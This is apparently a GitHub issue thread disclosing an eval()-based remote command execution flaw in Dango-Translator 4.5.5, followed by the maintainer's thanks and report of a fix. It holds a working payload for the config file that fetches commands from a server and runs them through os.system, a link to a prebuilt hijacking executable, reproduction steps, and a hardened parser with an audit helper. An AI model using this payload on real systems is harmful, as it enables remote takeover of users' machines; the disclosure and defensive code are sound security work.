PantsuDango / Dango-Translator

团子翻译器 —— an OCR-based translator made as a personal interest project
GNU Lesser General Public License v2.1

[Warning] Hijacked Remote Command Execute in Dango-Translator Ver4.5.5 #127

Closed Leeyangee closed 1 year ago

Leeyangee commented 1 year ago

Vulnerability Product: Dango-Translator Ver4.5.5
Vulnerability version: Ver4.5.5
Vulnerability type: Hijacked Remote Command Execute
Vulnerability Details:
Vulnerability location: app/config/cloud_config.json

Without checking the xxxUse variable in app/config/cloud_config.json before eval-ing it, an unsafe config may cause Hijacked Remote Command Execute.


client payload: "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"

remote hijacking program: https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe

remote hijacking program original code: https://github.com/Leeyangee/leeya_bug/tree/main/DangoTranslator_payload/testProject

PROVE:

Firstly, download Dango-Translator Ver4.5.5 and run the program to generate the config.

Secondly, go to app/config/cloud_config.json and replace the value of xxxUse with the client payload. Here, replace "tencentwebUse": "False" with "tencentwebUse": "__import__('urllib.request').request.urlopen('http://localhost:12345/DangoTranslate/ShowDict').read().decode('utf-8') + ('' if __import__('os').system(__import__('urllib.request').request.urlopen('http://localhost:12345/CmdPath').read().decode('utf-8')) else '')"

Thirdly, download the remote hijacking program: https://github.com/Leeyangee/leeya_bug/raw/main/DangoTranslator_payload/testProject/testProject.exe, and keep the program running. (This is a remote hijacking program, so you can deploy it on a server, but you need to change IP_DOMAIN in the original code and the url in the client payload and re-compile it.)


Fourthly, run "团子翻译器.exe". After logging in, Windows pops up a calculator (because the remote hijacking program runs the "calc" command on the client).

Once the client logs in, the remote hijacking program can detect it and run commands on the client.

This proves Hijacked Remote Command Execute.

REASON:

The client payload is divided into these parts:


The result of eval(client payload) is itself, because "tencentwebUse" will be evaled before exit.


Harm:

Attackers could replace the payload in order to make the client return a shell to them, so attackers could directly obtain a shell and get server permissions.

discovered by leeya_bug
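The root cause described in this report is that string values such as `tencentwebUse` are passed to `eval()` instead of being checked. The following is an added example (not code from the Dango-Translator project) that shows the vulnerable parsing pattern next to a hardened replacement and an audit helper that flags tampered values; the config shape and key names are assumed from the report, and the sample contents are constructed.

```python
import json

# Constructed sample in the shape of app/config/cloud_config.json (values assumed).
# "youdaowebUse" holds a benign non-boolean expression to stand in for a tampered value.
TAMPERED_CONFIG = json.dumps({
    "tencentwebUse": "False",
    "baiduwebUse": "True",
    "youdaowebUse": "1 + 1",
})
CLEAN_CONFIG = json.dumps({"tencentwebUse": "False", "baiduwebUse": "True"})

_BOOL_STRINGS = {"True": True, "False": False}


def unsafe_parse_use(config_text):
    """Vulnerable pattern: every *Use value is handed straight to eval()."""
    cfg = json.loads(config_text)
    return {k: eval(v) for k, v in cfg.items() if k.endswith("Use")}


def safe_parse_use(config_text):
    """Hardened pattern: accept only JSON booleans or the exact strings 'True'/'False'."""
    cfg = json.loads(config_text)
    result = {}
    for key, value in cfg.items():
        if not key.endswith("Use"):
            continue
        if isinstance(value, bool):
            result[key] = value
        elif isinstance(value, str) and value in _BOOL_STRINGS:
            result[key] = _BOOL_STRINGS[value]
        else:
            raise ValueError(f"{key}: expected 'True' or 'False', got {value!r}")
    return result


def audit_config(config_text):
    """Detection helper: list the *Use keys whose values are not plain booleans."""
    cfg = json.loads(config_text)
    return sorted(
        k for k, v in cfg.items()
        if k.endswith("Use")
        and not (isinstance(v, bool) or (isinstance(v, str) and v in _BOOL_STRINGS))
    )


def is_safe_config(config_text):
    """True when every *Use value passes the strict parser."""
    return audit_config(config_text) == []
```

Running `audit_config` over a deployed cloud_config.json before the application touches it is a cheap integrity check that catches exactly the tampering this report describes.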

PantsuDango commented 1 year ago

Thank you very, very much for raising this security risk. It was indeed my oversight; I did not pay enough attention to the possibility of it being exploited. In fact, the eval function is a very dangerous function, and I should avoid using it in the code wherever possible. So I have fully adopted your suggestion and fixed every place in the code that used eval.

The related fix has been pushed as a commit.

Thank you again!